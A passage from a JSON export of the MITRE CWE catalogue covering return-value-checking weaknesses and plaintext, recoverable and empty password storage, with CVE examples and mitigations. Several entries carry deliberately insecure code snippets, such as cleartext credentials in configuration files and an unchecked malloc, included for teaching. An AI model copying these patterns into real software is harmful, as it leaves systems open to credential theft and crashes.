(CWE-862)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17533"},{"Reference":"CVE-2020-6078","Description":"Chain: The return value of a function returning a pointer is not checked for success (CWE-252) resulting in the later use of an uninitialized variable (CWE-456) and a null pointer dereference (CWE-476)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6078"},{"Reference":"CVE-2019-15900","Description":"Chain: sscanf() call is used to check if a username and group exists, but the return value of sscanf() call is not checked (CWE-252), causing an uninitialized variable to be checked (CWE-457), returning success to allow authorization bypass for executing a privileged (CWE-863).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15900"},{"Reference":"CVE-2007-3798","Description":"Unchecked return value leads to resultant integer overflow and code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3798"},{"Reference":"CVE-2006-4447","Description":"Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4447"},{"Reference":"CVE-2006-2916","Description":"Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2916"},{"Reference":"CVE-2008-5183","Description":"chain: unchecked return value can lead to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5183"},{"Reference":"CVE-2010-0211","Description":"chain: unchecked return value (CWE-252) leads to free of invalid, uninitialized pointer (CWE-824).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0211"},{"Reference":"CVE-2017-6964","Description":"Linux-based device mapper encryption program does not check the return value of setuid and setgid allowing attackers to execute code with unintended privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6964"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Unchecked Return Value"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Ignored function return value"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A7","Entry_Name":"Improper Error Handling","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR33-C","Entry_Name":"Detect and handle standard library errors","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS54-C","Entry_Name":"Detect and handle POSIX library errors","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"EXP00-J","Entry_Name":"Do not ignore values returned by methods"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP32-PL","Entry_Name":"Do not ignore function return values","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-252-resource"},{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-CWE-252-data"},{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-CWE-252-resource"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, &#34;Program Building Blocks&#34; Page 341"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 20, &#34;Checking Returns&#34; Page 624"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 11: Failure to Handle Errors Correctly.&#34; Page 183"}},{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-CWE-252-data"}},{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-CWE-252-resource"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-252-resource"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Background_Details, Demonstrative_Examples, Description, Observed_Examples, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Name":"Martin Sebor","Contribution_Organization":"Cisco Systems, Inc.","Contribution_Date":"2010-04-30","Contribution_Comment":"Provided Demonstrative Example and suggested CERT reference"}}},"253":{"attr":{"@_ID":"253","@_Name":"Incorrect Check of Function Return Value","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software incorrectly checks a return value from a function, which prevents the software from detecting errors or exceptional conditions.","Extended_Description":"Important and common functions will return some value about the success of its actions. This will alert the program whether or not to handle any errors caused by that function.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"754","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":["Availability","Integrity"],"Impact":["Unexpected State","DoS: Crash, Exit, or Restart"],"Note":"An unexpected return value could place the system in a state that could lead to a crash or other unintended behaviors."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Strategy":"Language Selection","Description":"Use a language or compiler that uses exceptions and requires the catching of those exceptions."},{"Phase":"Implementation","Description":"Properly check all functions which return a value."},{"Phase":"Implementation","Description":"When designing any function make sure you return a value or throw an exception in case of an error."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code attempts to allocate memory for 4 integers and checks if the allocation succeeds.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"tmp = malloc(sizeof(int) * 4);if (tmp &lt; 0 ) {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"perror(\\"Failure\\");","xhtml:br":["",""],"xhtml:i":"//should have checked if the call returned 0"}}}},"Body_Text":"The code assumes that only a negative return value would indicate an error, but malloc() may return a null pointer when there is an error. The value of tmp could then be equal to 0, and the error would be missed."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Misinterpreted function return value"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR33-C","Entry_Name":"Detect and handle standard library errors","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS54-C","Entry_Name":"Detect and handle POSIX library errors","Mapping_Fit":"Imprecise"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, &#34;Return Value Testing and Interpretation&#34;, Page 340"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"}],"Previous_Entry_Name":{"#text":"Misinterpreted Function Return Value","attr":{"@_Date":"2009-03-10"}}}},"256":{"attr":{"@_ID":"256","@_Name":"Plaintext Storage of a Password","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Storing a password in plaintext may result in a system compromise.","Extended_Description":"Password management issues occur when a password is stored in plaintext in an application\'s properties, configuration file, or memory. Storing a plaintext password in a configuration file allows anyone who can read the file access to the password-protected resource. In some contexts, even storage of a plaintext password in memory is considered a security risk if the password is not cleared immediately after it is used.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"522","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Architecture and Design","Note":"Developers sometimes believe that they cannot defend the application from someone who has access to the configuration, but this belief makes an attacker\'s job easier."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Avoid storing passwords in easily accessible locations."},{"Phase":"Architecture and Design","Description":"Consider storing cryptographic hashes of passwords as an alternative to storing in plaintext."},{"Description":"A programmer might attempt to remedy the password management problem by obscuring the password with an encoding function, such as base 64 encoding, but this effort does not adequately protect the password because the encoding can be detected and decoded easily.","Effectiveness":"None"}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-57"},"Intro_Text":"The following code reads a password from a properties file and uses the password to connect to a database.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...Properties prop = new Properties();prop.load(new FileInputStream(\\"config.properties\\"));String password = prop.getProperty(\\"password\\");DriverManager.getConnection(url, usr, password);...","xhtml:br":["","","","",""]}},"Body_Text":"This code will run successfully, but anyone who has access to config.properties can read the value of password. If a devious employee has access to this information, they can use it to break into the system."},{"attr":{"@_Demonstrative_Example_ID":"DX-58"},"Intro_Text":"The following code reads a password from the registry and uses the password to create a new network credential.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...String password = regKey.GetValue(passKey).toString();NetworkCredential netCred = new NetworkCredential(username,password,domain);...","xhtml:br":["","",""]}},"Body_Text":"This code will run successfully, but anyone who has access to the registry key used to store the password can read the value of password. If a devious employee has access to this information, they can use it to break into the system"},{"attr":{"@_Demonstrative_Example_ID":"DX-43"},"Intro_Text":"The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext.","Body_Text":["This Java example shows a properties file with a cleartext username / password pair.","The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext.","Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword...","xhtml:br":["","","","",""],"xhtml:i":"# Java Web App ResourceBundle properties file"}},{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"...&lt;connectionStrings&gt;&lt;/connectionStrings&gt;...","xhtml:br":["",""],"xhtml:div":{"#text":"&lt;add name=\\"ud_DEV\\" connectionString=\\"connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;\\" providerName=\\"System.Data.Odbc\\" /&gt;","attr":{"@_style":"margin-left:10px;"}}}}]}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Password Management"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-207"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Modes_of_Introduction, Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Description, Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Plaintext Storage","attr":{"@_Date":"2008-01-30"}},{"#text":"Plaintext Storage of a Password","attr":{"@_Date":"2018-01-23"}},{"#text":"Plaintext Storage of a Password","attr":{"@_Date":"2018-03-27"}},{"#text":"Unprotected Storage of Credentials","attr":{"@_Date":"2021-07-20"}}]}},"257":{"attr":{"@_ID":"257","@_Name":"Storing Passwords in a Recoverable Format","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The storage of passwords in a recoverable format makes them subject to password reuse attacks by malicious users. In fact, it should be noted that recoverable encrypted passwords provide no significant benefit over plaintext passwords since they are subject not only to reuse by malicious attackers but also by malicious insiders. If a system administrator can recover a password directly, or use a brute force search on the available information, the administrator can use the password on other accounts.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"522","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"259","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control"],"Impact":"Gain Privileges or Assume Identity","Note":"User\'s passwords may be revealed."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"Revealed passwords may be reused elsewhere to impersonate the users in question."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Use strong, non-reversible encryption to protect stored passwords."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-59"},"Intro_Text":"Both of these examples verify a password by comparing it to a stored compressed version.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int VerifyAdmin(char *password) {}","xhtml:div":{"#text":"if (strcmp(compress(password), compressed_password)) {}printf(\\"Entering Diagnostic Mode...\\\\n\\");return(1);","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"printf(\\"Incorrect Password!\\\\n\\");return(0);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""]}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"int VerifyAdmin(String password) {}","xhtml:div":{"#text":"if (passwd.Equals(compress(password), compressed_password)) {}return(1);","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"return(0);","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":["",""],"xhtml:i":"//Diagnostic Mode"}}}],"Body_Text":"Because a compression algorithm is used instead of a one way hashing algorithm, an attacker can recover compressed passwords stored in the database."},{"attr":{"@_Demonstrative_Example_ID":"DX-43"},"Intro_Text":"The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext.","Body_Text":["This Java example shows a properties file with a cleartext username / password pair.","The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext.","Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword...","xhtml:br":["","","","",""],"xhtml:i":"# Java Web App ResourceBundle properties file"}},{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"...&lt;connectionStrings&gt;&lt;/connectionStrings&gt;...","xhtml:br":["",""],"xhtml:div":{"#text":"&lt;add name=\\"ud_DEV\\" connectionString=\\"connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;\\" providerName=\\"System.Data.Odbc\\" /&gt;","attr":{"@_style":"margin-left:10px;"}}}}]}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Storing passwords in a recoverable format"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"49"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Notes":{"Note":{"#text":"The meaning of this entry needs to be investigated more closely, especially with respect to what is meant by \\"recoverable.\\"","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Demonstrative_Examples, Description, Maintenance_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Maintenance_Notes"}]}},"258":{"attr":{"@_ID":"258","@_Name":"Empty Password in Configuration File","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Using an empty string as a password is insecure.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"260","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"521","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Potential_Mitigations":{"Mitigation":{"Phase":"System Configuration","Description":"Passwords should be at least eight characters long -- the longer the better. Avoid passwords that are in any way similar to other passwords you have. Avoid using words that may be found in a dictionary, names book, on a map, etc. Consider incorporating numbers and/or punctuation into your password. If you do use common words, consider replacing letters in that word with numbers and punctuation. However, do not use \\"similar-looking\\" punctuation. For example, it is not a good idea to change cat to c@t, ca+, (@+, or anything similar. Finally, it is never appropriate to use an empty string as a password."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but the password is provided as an empty string.","Body_Text":["This Java example shows a properties file with an empty password string.","The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database and the password is provided as an empty string.","An empty string should never be used as a password as this can allow unauthorized access to the application. Username and password information should not be included in a configuration file or a properties file in clear text. If possible, encrypt this information and avoid CWE-260 and CWE-13."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...webapp.ldap.username=secretUsernamewebapp.ldap.password=...","xhtml:br":["","","","",""],"xhtml:i":"# Java Web App ResourceBundle properties file"}},{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"...&lt;connectionStrings&gt;&lt;add name=\\"ud_DEV\\" connectionString=\\"connectDB=uDB; uid=db2admin; pwd=; dbalias=uDB;\\" providerName=\\"System.Data.Odbc\\" /&gt;&lt;/connectionStrings&gt;...","xhtml:br":["","","",""]}}]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Password Management: Empty Password in Configuration File"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-207"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, 